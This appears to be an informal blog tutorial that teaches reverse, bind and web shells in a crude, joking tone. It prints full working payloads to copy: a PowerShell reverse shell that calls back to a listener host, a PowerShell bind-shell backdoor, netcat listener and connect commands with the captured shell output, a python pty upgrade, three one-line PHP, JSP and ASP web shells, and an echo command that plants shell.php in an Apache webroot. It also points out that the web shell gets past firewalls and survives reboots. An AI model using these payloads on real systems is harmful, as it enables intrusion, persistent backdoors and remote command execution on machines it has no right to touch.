Table of contents
Open Table of contents
Shell Exploit Types
There are various types of shell exploits and how to use them. In this we will be learning about the 3 main types
-
Reverse Shell: Gives a call to your system that is listening.
-
Bind Shell: Is your typical “backdoor” entryway into systems. Once created stays there till reboot
-
Web Shell: Isn’t much really a shell as runs a single pre-defined command through http parameters
Reverse Shell
Has to easily be the quickest way into a woman’s system’s heart. All we need to do is identify a vulnerability in the remote host that allows for remote code execution(script kiddies, nmap the ports and then msf lookup the exploit if it exists).
Done even more soo easier if one has physical access to the system. But in that case a bind shell would work much better(more on that later).
To set it up all you need to do is start a netcat listener on a port of your choice:
zangetsu$ nc -lvnp 1234
listening on [any] 1234 ...the l,v,n,p flags are listen, verbose(tells you you have a connection),disable DNS and the port number.
now we cast a net, time to dump the chum.
To find a list of reverse shells commands cuz u a lazy cunt, Payload All The Things got u covered. Should help you out till you can start writing scripts for this yourself. Lets try the one for PowerShell for windows machines(careful if you copy this, windows defender will delete the file containing this. Huge pain in the ass when writing this.)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<hostip>',<port>);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"replace hostip and port with your respective numbers.
zangetsu$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [hostip] from (UNKNOWN) [hostip] 41572
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)Bind Shell
Kinda similar theory just flipped the script. Rapunzel already exists with the long hair in the tower you need her to throw it down for you. Time to get your wooing skills ready.
Steal Take a script from Payload of things. Now this will be the listener and we shall be the caller.
powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();now that the backdoor is setup we use netcat to call on the designated port:
Romeo$ nc 10.10.10.1 1234
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)now this is a forever connection you can disconnect and reconnect whenever you wish until the host is rebooted.
Now you may be wondering this sounds a little too easy for comfort why would anyone spend their time trying to Nmap then MSF a system when we can have him just do this. If you were following along with this blog you will notice the shell you create here has a minor flaw. You can only type and delete. No moving within the command to change your typos or modifying long payloads for your convenience.
We must now upgrade
Upgrading to TTY
There are many ways to do this. Easiest way is i think the python/stty method.
in the netcat shell run
python -c 'import pty; pty.spawn("/bin/bash")'then return to your regular shell. (clt + z) and run
stty raw -echo
fgyou can use stty to do various other things too like size of the terminal or colour or rows and coloums of the terminal. If you do this often it is recommended to have a complete set of commands pre-defined so you can just paste once and you are at home(in someone else’s home).
Web Shell
Aye wait read this. This is cool too I swear. Don’t worry this is not as complex as the previous two. It is easier to catch tho… soo weigh your scales accordingly :)
<?php system($_REQUEST["cmd"]); ?><% Runtime.getRuntime().exec(request.getParameter("cmd")); %><% eval request("cmd") %>3 common ones. simple huh. There’s a reason php deserves to die.
Soo once you have a web shell you take it and yoink it at a Webroot of a server. relatively easy to find most commonly kept here,
- Apache: /var/www/html
- Nginx: /usr/local/nginx/html
- XAMPP: C:/xampp/htdocs/
geniuses huh, it’s no wonder they don’t hire junior devs.
soo based on banner retrieval we can change the shell command accordingly for example the Apache Linux server would be:
echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.phpto connect just got to “link/shell.php?cmd=id”
we can keep changing the command to get its output. A great benefit of a web shell is that it would bypass any firewall restriction in place, as it will not open a new connection on a port but run on the web port on 80 or 443, or whatever port the web application is using. Another great benefit is that if the compromised host is rebooted, the web shell would still be in place, and we can access it and get command execution without exploiting the remote host again.
On the other hand, a web shell is not as interactive as reverse and bind shells are since we have to keep requesting a different URL to execute our commands. Still, in extreme cases, it is possible to code a Python script to automate this process and give us a semi-interactive web shell right within our terminal.
Hope this helped :)